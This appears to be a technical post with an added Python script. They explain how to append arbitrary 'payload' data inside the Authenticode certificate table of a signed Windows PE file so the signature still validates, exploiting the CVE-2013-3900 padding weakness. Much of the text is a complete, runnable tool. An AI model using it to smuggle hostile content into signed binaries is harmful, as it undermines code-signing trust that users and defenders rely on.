The idea is to append the data to the Attribute Certificate Table at the end of the file, which the Authenticode signature does not cover. A little background first:
- How the signature is generated and verified: the executable is hashed (skipping the areas listed below), the hash is signed, and the signed hash is wrapped in a PKCS#7 SignedData blob together with the signer's certificate, which chains to some certificate authority. This blob is attached to the end of the PE file in the certificate table. When the signature is checked, Windows recomputes the hash of the file and compares it with the hash inside the signed blob.
- Three areas of the PE file are excluded from the hash computation:
- the CheckSum field in the optional header (Windows-specific fields), 4 bytes at optional-header offset 0x40
- the Certificate Table data directory entry in the optional header (entry index 4, IMAGE_DIRECTORY_ENTRY_SECURITY), 8 bytes: a 4-byte file offset and a 4-byte size
- the Attribute Certificate Table itself at the end of the file, variable length
How to add the payload to a file without invalidating the signature:
- The offset of the PE header is stored at 0x3c (e_lfanew); read that 4-byte value as pe_offset
- At pe_offset the file contains the signature "PE\0\0", which is 4 bytes
- From pe_offset, find the Certificate Table data directory entry: skip the 4-byte signature and the 20-byte COFF file header, and for PE32 the entry sits 128 bytes into the optional header, so the entry is at pe_offset + 0x98 (152 bytes). For PE32+ the optional header is laid out differently and the entry is 144 bytes in, so pe_offset + 0xa8 (168 bytes); the magic word at the start of the optional header (0x10b for PE32, 0x20b for PE32+) tells the two apart.
- Read the certificate table offset (4 bytes, an absolute file offset) and then the certificate table size (4 bytes)
- Add the (padded) payload length to that size
- Seek to the certificate table (the absolute location from the previous step). It starts with a WIN_CERTIFICATE header: dwLength (4 bytes), wRevision (2 bytes), wCertificateType (2 bytes), followed by the PKCS#7 blob. Increase dwLength by the same amount as the directory size.
- Then go to the end of the file and append the payload. It must land inside the certificate table: any bytes past the end of the table are part of the hash, so simply appending without fixing the two sizes breaks the signature.
- Optionally recompute the PE checksum. The CheckSum field is excluded from the hash, so updating it cannot hurt, and the loader enforces it for drivers and some system DLLs.
Note: the 0x98 offset above is for PE32 (32-bit); PE32+ uses 0xa8, as described above. The payload needs to be padded to a multiple of 8 bytes because WIN_CERTIFICATE entries are 8-byte aligned (dwLength is rounded up to 8 when walking the table). All the 32-bit constants are little-endian. Caveat: the technique works because the verifier ignores trailing bytes inside the certificate table; Windows can optionally reject signatures with such unexpected trailing data since the MS13-098 update (CVE-2013-3900) when the EnableCertPaddingCheck value is set under HKLM\SOFTWARE\Microsoft\Cryptography\Wintrust\Config, so test on the target configuration.
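The whole procedure as a script, added here as an example and not part of the original post. It locates the three excluded areas for both PE32 and PE32+, grows the WIN_CERTIFICATE entry so the payload sits inside the certificate table, recomputes the PE checksum, and includes a simplified model of which bytes Authenticode hashes so you can confirm they did not change. It assumes a single WIN_CERTIFICATE entry whose dwLength spans the whole table and which ends the file (the normal signtool layout); the build_test_pe32 helper constructs a minimal, non-loadable PE32 skeleton with a fake signature blob so the script runs offline.

```python
# Added example (not from the original post): append a payload inside the
# Authenticode certificate table of a PE file without breaking the signature.
# Handles PE32 and PE32+; assumes one WIN_CERTIFICATE entry that ends the file.
import struct
import sys

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B
SECURITY_DIR_INDEX = 4            # IMAGE_DIRECTORY_ENTRY_SECURITY


def locate_fields(pe):
    """Return file offsets of (CheckSum, security dir entry, cert table, cert size)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    pe_off = struct.unpack_from("<I", pe, 0x3C)[0]        # e_lfanew
    if pe[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt_off = pe_off + 4 + 20                             # skip signature + COFF file header
    magic = struct.unpack_from("<H", pe, opt_off)[0]
    if magic == PE32_MAGIC:
        dirs_off = opt_off + 96                           # data directories start, PE32
    elif magic == PE32PLUS_MAGIC:
        dirs_off = opt_off + 112                          # data directories start, PE32+
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    checksum_off = opt_off + 64                           # same offset in both formats
    secdir_off = dirs_off + 8 * SECURITY_DIR_INDEX
    cert_off, cert_size = struct.unpack_from("<II", pe, secdir_off)
    return checksum_off, secdir_off, cert_off, cert_size


def pe_checksum(data, checksum_off):
    """Standard PE CheckSum: fold 32-bit words, skip the CheckSum field, add file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def append_to_cert_table(pe, payload, fix_checksum=True):
    """Grow the single WIN_CERTIFICATE so the payload lands inside the unhashed table."""
    checksum_off, secdir_off, cert_off, cert_size = locate_fields(pe)
    if cert_size == 0:
        raise ValueError("file is not signed (empty certificate table)")
    if cert_off + cert_size != len(pe):
        raise ValueError("certificate table does not end the file; trailing data is hashed")
    if struct.unpack_from("<I", pe, cert_off)[0] != cert_size:
        raise ValueError("expected a single WIN_CERTIFICATE whose dwLength spans the table")
    padded = payload + b"\0" * (-len(payload) % 8)       # entries stay 8-byte aligned
    out = bytearray(pe + padded)
    new_size = cert_size + len(padded)
    struct.pack_into("<I", out, secdir_off + 4, new_size) # data directory Size
    struct.pack_into("<I", out, cert_off, new_size)       # WIN_CERTIFICATE.dwLength
    if fix_checksum:                                      # field is excluded from the hash
        struct.pack_into("<I", out, checksum_off, pe_checksum(bytes(out), checksum_off))
    return bytes(out)


def hashed_bytes(pe):
    """Simplified model of what Authenticode hashes: the file minus the three excluded
    areas. (Real hashing also orders sections by PointerToRawData; irrelevant here
    because no section moves.)"""
    checksum_off, secdir_off, cert_off, cert_size = locate_fields(pe)
    out, pos = bytearray(), 0
    for off, length in sorted([(checksum_off, 4), (secdir_off, 8), (cert_off, cert_size)]):
        out += pe[pos:off]
        pos = off + length
    return bytes(out + pe[pos:])


def build_test_pe32(signature_blob):
    """Constructed, non-loadable PE32 skeleton with one WIN_CERTIFICATE at end of file."""
    pe_off = 0x40
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, pe_off)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 92, 16)                   # NumberOfRvaAndSizes
    body = b"\xCC" * 64                                   # stands in for section data
    blob = signature_blob + b"\0" * (-(8 + len(signature_blob)) % 8)
    cert = struct.pack("<IHH", 8 + len(blob), 0x0200, 0x0002) + blob  # rev 2, PKCS#7
    cert_off = len(dos) + len(coff) + len(opt) + len(body)
    struct.pack_into("<II", opt, 96 + 8 * SECURITY_DIR_INDEX, cert_off, len(cert))
    pe = bytearray(bytes(dos) + coff + bytes(opt) + body + cert)
    cs_off = pe_off + 24 + 64
    struct.pack_into("<I", pe, cs_off, pe_checksum(bytes(pe), cs_off))
    return bytes(pe)


if __name__ == "__main__":
    if len(sys.argv) != 4:
        sys.exit("usage: %s signed.exe payload.bin out.exe" % sys.argv[0])
    with open(sys.argv[1], "rb") as f, open(sys.argv[2], "rb") as p:
        patched = append_to_cert_table(f.read(), p.read())
    with open(sys.argv[3], "wb") as o:
        o.write(patched)
```

Run it as `python script.py signed.exe payload.bin out.exe` against a real signed binary, then confirm with `signtool verify /pa /v out.exe` (or Get-AuthenticodeSignature in PowerShell) that the signature still validates. The hashed_bytes comparison is the check worth keeping in any tooling built on this: if it differs before and after patching, the verifier will reject the file regardless of what the sizes say.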